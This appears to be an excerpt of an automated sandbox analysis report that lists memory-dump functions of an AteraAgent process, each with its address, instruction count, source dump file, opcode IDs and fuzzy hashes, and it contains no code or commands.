                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 562789eddf1333c64615324926e9749c6a64f84190bd4bcb318ceaea3747c6cd
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: f825604b313292ecc0c314b9812088ce470994cc3d4966d052a9e6327b9b046e
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 562789eddf1333c64615324926e9749c6a64f84190bd4bcb318ceaea3747c6cd
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8531296170F6CA0FE769A77C88656B47FE1DF9724070944FAD099CF1B7D918B80A8340
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B639A17 Relevance: .1, Instructions: 102COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: b778187c9e4928242772bc8410af4f1bc49211ed3dfb4fff78c964407c0a1c17
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 80855a531872e8dd75bedf22e98577ccc0188d043446a054453b69d43cff612e
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b778187c9e4928242772bc8410af4f1bc49211ed3dfb4fff78c964407c0a1c17
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B4310430A0960A8FD729EB68D0D09A577A1EF51314B1982F5D06CCF0ABDA2CBD86C7C0
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B838C78 Relevance: .1, Instructions: 100COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 05cc413ed48022de6eb6f8d88cf49ff0de1221ab8ed8a39572fea97375eeb3ab
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: a4569fc00c86daeae9adcebc75a8558e003702fba65b0ee1f7c0fa3214e0dd59
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 05cc413ed48022de6eb6f8d88cf49ff0de1221ab8ed8a39572fea97375eeb3ab
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E921F672E1F68D4FEB969BA498255E8BBB0FF06300F0901BAD049D72E2CA795846C741
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B632B75 Relevance: .1, Instructions: 99COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: cbce9908a1e72e01ca33ad8574ae7fb7b40deb3dd556527843351e483b972680
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 9197a86002cdba5c1ea4f5364a9cc90ee4d3d77f2d5977c45751d255bc1ca4dd
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cbce9908a1e72e01ca33ad8574ae7fb7b40deb3dd556527843351e483b972680
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E21FB63B1FB4906E7B999AC78F50B52BC2DFD566471E01BAD058CB2E2E80668428381
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B623AA5 Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 03d6479a6a65ce7f8250831b0c0d314037d9e0a509445b8a9800629de0c519b8
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 9ddd31cca0befea6e06189e64c78a8316bacd175976d776bda34b55174531ee3
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 03d6479a6a65ce7f8250831b0c0d314037d9e0a509445b8a9800629de0c519b8
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1531C470A0DA8D8FEB55DFA8C4256E9BFF1FF5A300F0401A6D048DB296CB34A941D750
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B625201 Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 81cced046cebc2a29b32c941dc52d124dd373dfb99d20a239055b03e34d9802d
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 1bd260fa233db47abf230b9f9186eb16f93c24aad51c5a7882f25acacfc5e8e9
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 81cced046cebc2a29b32c941dc52d124dd373dfb99d20a239055b03e34d9802d
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB216D30E09A5D8FDF95DFA8C8616EDBBF0FF5A300F0401AAD418E7296CA34A8418781
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B8321FA Relevance: .1, Instructions: 89COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 00e49911d2daadb4a7f4be1a2ae0e2479959824ca20165403492ce5fb6117592
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: d4dd4343e99a8957976f0b62dfe15160c44ffda256f6b6b41ab4b40e37bdb0c2
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 00e49911d2daadb4a7f4be1a2ae0e2479959824ca20165403492ce5fb6117592
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A21C431B1EA0F4FDBA89F9C94A1AB8B791EF58380F4101BAD00DC72A6DD24B9418781
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B83FCF1 Relevance: .1, Instructions: 88COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 83a73105ed5be9796640da083de65fcf9bb4408c9cc50361ca84d0bbecb5351e
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 79771b6d9f5cf209ed21ddf25f62d452d08c1594a6e09997e1878c0874a5690b
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 83a73105ed5be9796640da083de65fcf9bb4408c9cc50361ca84d0bbecb5351e
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C218E3170EE4D4FD7A5DB6C98A8A653BD1FF9D31471A01EAE08CCB262CA11A841C741
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B6289A5 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: aa51566a63cb8cbfe2172f9f0c926cd1340d399859e7286a5d1293f0a8607ac4
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 3c516530f398687eab37da3fbc3ea281a570dbc63631c18a397458238b6c2a37
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aa51566a63cb8cbfe2172f9f0c926cd1340d399859e7286a5d1293f0a8607ac4
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E21B530D0A64E8BFB749BA484506E8BBB0EF46354F150279D45CDB1A2DA356A85C750
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B83E20D Relevance: .1, Instructions: 84COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: df9520c0746ac2dfef5b82b5c0d16460b35465c3a6c3d8f547c2583c909c107b
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 1b3afa31a0f16ae4ce55a99c64f1b418a6e3cf0e3863b8bedb367a4f60be7f9e
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: df9520c0746ac2dfef5b82b5c0d16460b35465c3a6c3d8f547c2583c909c107b
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4921A772F0AA5D0FDBA1DBA898A52EC7BE1EF5D311B0601B7E40CD72A2DE186D058351
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B62D965 Relevance: .1, Instructions: 84COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 6f500cb4ec6accaf2a94096d7490809a64128dfd21a67e8c16f12100119c21da
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 6fb1b2c00fe549b340ee47fa4ce8ac2ae2b14853ee548858e0c8e828d43a5a9f
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6f500cb4ec6accaf2a94096d7490809a64128dfd21a67e8c16f12100119c21da
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F2218671A0E7C94FE7069B6888659A4BFB0EF5720170941FBE088CF1F3CA287945C761
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B62425B Relevance: .1, Instructions: 84COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 5fd46b3d2e2e111eecc4e39694d559afac3972e450e4c29aa9d8c13c7708307e
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 52e6a5fb3c6de1b99448331a173dbb9fcdadfee1795a4b9f41232f2659a5f4cd
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5fd46b3d2e2e111eecc4e39694d559afac3972e450e4c29aa9d8c13c7708307e
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F9215E3288F3C94FE32247A168225E57F74AF03255F1B01EBD098DF4A3C51D669AC762
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B625220 Relevance: .1, Instructions: 82COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 24ea29a5675101865fba02691d00690b931efc169df3a665fa3efc3f45941c61
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: b3dca5af38e3e50fe24e8a3386bae44d1e8d32997b97bc8e94c41c569ff4ca1d
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 24ea29a5675101865fba02691d00690b931efc169df3a665fa3efc3f45941c61
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B2214F30E09A5D8FDF95EFA8D855AEDBBF0FF59300F04056AE419E3295CA34A840CB91
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B837960 Relevance: .1, Instructions: 78COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 7bae2a200dc5bdc9f7cf10931dbe2ba2ca1e9d068ba1a2cb13c71e39c087ac9c
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 1a467fb77a1d3e1680225120534222ebddea50aa609d3c0cbd800bb49c1f91a8
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7bae2a200dc5bdc9f7cf10931dbe2ba2ca1e9d068ba1a2cb13c71e39c087ac9c
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7021C530609A0D8FDBA9EF58C494BA177A1FF49304F150AE8D01DCB29ADA35FD81C780
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B6360F0 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 344e4f9343e6ef7965d4290503e5c2bbc8caf40572db7c1f059a3060e5b97a8b
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 7f01e6cad49a073dc597e0e650e71d97c48beaec55ded8285e68fd5ab9f66bff
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 344e4f9343e6ef7965d4290503e5c2bbc8caf40572db7c1f059a3060e5b97a8b
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE11A532B0FD4D0FEAE845AD3CA51753EC2DBD961571A01BBE85CC72B6DC52AD418281
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B63D17D Relevance: .1, Instructions: 74COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 678476264f254dfe02abb53f003b9abba2d0c0dba7b5a59e3446397011f09bb0
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 9e3db4cc32269eafb00214249a2110a80d62ba2e1e26d574effdf2ba6d77994c
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 678476264f254dfe02abb53f003b9abba2d0c0dba7b5a59e3446397011f09bb0
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2211E925A4F6CD0FE762B3A828301A57FA1DF4722470901F7E49CCA0D3D9087955C386
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B83FDA2 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: e7838adf7d58806afed0fd509de318c3315f3d3a0e436763ca119a75d59b3d19
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: b8539a064015bded78ffcab1207ce7f972f3b5d4b440f42a3376793d7f56ba8c
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e7838adf7d58806afed0fd509de318c3315f3d3a0e436763ca119a75d59b3d19
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F3115A3020D9498FDBA5EB6CD8A8E617BE0EF6932070A40E7D04CCB262CA14EC45CB91
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B635312 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 9aca07b96b1b6cf333ac696839f8c8b7636d7c9c7ab8d8841b66eb748bed4952
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 337f0dd4ab9ccb699d87089812050e28c7d7c094ade27dfd0051410de568fdd9
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9aca07b96b1b6cf333ac696839f8c8b7636d7c9c7ab8d8841b66eb748bed4952
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F5117C63B0EE4F4FFBA8DA5C906427563D2EBA839071545BED41ECB1A5EE11BC0A8740
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B63EA8D Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 4fa4a78d4f216cfff74f8f59cf988897d286706b67d8f5587177254d0bba023e
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 451a5f2c6304d860d44c16104bc081459425c02bf7c05ed7378ddaa78c3b1ed8
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4fa4a78d4f216cfff74f8f59cf988897d286706b67d8f5587177254d0bba023e
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A311E312A0EFC94FE7AA9B7C04741656FE1EF56210B0905BAD4D9CA1E7DC4839458361
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B840665 Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 2c2b29ef6e97f9ab5c5dc066d6bbfffc0caec625163b02927ec6acf0618914fb
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 3a039309a5ec50ac51fb392bd87e89a9cecc2d92d82a5de4abeede0d973256a7
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c2b29ef6e97f9ab5c5dc066d6bbfffc0caec625163b02927ec6acf0618914fb
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E01D630618E1D8FDFA4EA5DC4D5EB533E1EF6C35534600E6D45ACB2A2DA28FD818790
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B83222D Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 368273008930edb0926ddc490747300f60deac3b609124e0fae6b200df25e75d
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 029eb4d24aa92e2f8b3bcb68d7efd1dfd7b2783cba6e2cb15e653b57b179c1fd
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 368273008930edb0926ddc490747300f60deac3b609124e0fae6b200df25e75d
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DE11E931B0DA1E4FEB749FDC68516B8B790EF59350F0102B6C049C3292DD25B95282C1
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B63714C Relevance: .1, Instructions: 65COMMON
